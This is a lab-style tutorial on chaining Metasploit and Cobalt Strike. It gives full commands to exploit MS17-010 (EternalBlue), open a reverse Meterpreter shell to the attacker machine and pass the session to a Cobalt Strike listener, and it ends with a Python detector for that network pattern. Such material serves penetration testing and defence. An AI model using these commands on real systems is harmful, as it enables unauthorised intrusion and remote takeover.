How to make MSF and CobaltStrike Linkage

2025-01-18 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article shows how to link MSF and CobaltStrike. The content is concise and easy to understand, and I hope you gain something from the detailed walkthrough.

0x00 Environment Introduction

Attacker machine: 192.168.60.129 (kali)

Victim: 192.168.60.131

Gateway: 192.168.60.2

Tools: nmap, metasploit, cobaltstrike

0x01 Attack preparation

First, deploy the victim host and configure the network adapters so that the machines can communicate with each other.

Next, deploy web application services on it so that it looks like a real application server.

0x02 Pre-attack phase

Information gathering with nmap revealed open ports 445 and 3389 and the operating system version.

nmap -A 192.168.60.131

Information gathering shows that port 445 is open on the system, so tools are used to check whether the ms17_010 vulnerability exists.

Tool 1: Metasploit takes the stage

First, open msf and exploit the vulnerability.

1. Search for the exploit module

search ms17_010

2. Use the exploit module for the vulnerability

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129

session

Enter the meterpreter session.

Tool 2: Cobaltstrike takes the stage

If you find the functionality too limited, you can also link MSF with Cobaltstrike.

Start Cobaltstrike

We now have a session of the MSF meterpreter type, with session id 1.

Create a new listener in Cobaltstrike, configured as follows:

Configure MSF as follows:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1

exploit

You can see that the Meterpreter session that MSF bounced back was captured in Cobaltstrike.

Finally, the penetration modules integrated in Cobaltstrike can be used for further testing.

Note: Only Meterpreter-type sessions can be passed to Cobaltstrike.
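
From the defender's side, the sequence above leaves a recognizable network pattern: the victim accepts SMB on 445 from a peer and then opens outbound connections to that same peer, first for the Meterpreter session and then to the listener on port 12388. The following Python is an added example (not part of the original article) that flags this pattern in flow records; the sample records, port 4444, the time window and the allowed-port list are constructed assumptions.

```python
from collections import defaultdict

# Constructed flow records (epoch seconds, src, dst, dst_port). Addresses and
# port 12388 follow the lab above; port 4444 and the timings are assumptions.
SAMPLE_FLOWS = [
    (1000, "192.168.60.129", "192.168.60.131", 445),
    (1004, "192.168.60.131", "192.168.60.129", 4444),
    (1300, "192.168.60.131", "192.168.60.129", 12388),
    (1310, "192.168.60.131", "192.168.60.129", 12388),
    (1200, "192.168.60.131", "192.168.60.2", 53),     # ordinary DNS to the gateway
    (2000, "192.168.60.50", "192.168.60.131", 445),   # file-share client, no callback
]

def find_handoffs(flows, window=900, expected_ports=frozenset({53, 80, 443})):
    """Return alerts for hosts that accept SMB from a peer and then call back to it.

    An alert fires when host H receives a connection on 445 from peer P and,
    within `window` seconds, H opens connections to P on ports outside
    `expected_ports`. Two or more distinct callback ports is rated 'high',
    which is consistent with a session being passed to a second listener.
    """
    smb_in = {}                    # (host, peer) -> time of first inbound SMB
    callbacks = defaultdict(set)   # (host, peer) -> callback ports seen
    for ts, src, dst, dport in sorted(flows):
        if dport == 445:
            smb_in.setdefault((dst, src), ts)
            continue
        key = (src, dst)
        start = smb_in.get(key)
        if start is None or not 0 <= ts - start <= window:
            continue
        if dport not in expected_ports:
            callbacks[key].add(dport)
    alerts = []
    for (host, peer), ports in sorted(callbacks.items()):
        alerts.append({"host": host, "peer": peer, "ports": sorted(ports),
                       "severity": "high" if len(ports) >= 2 else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in find_handoffs(SAMPLE_FLOWS):
        print(alert)
```
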

That's how MSF and Cobalt Strike work together.
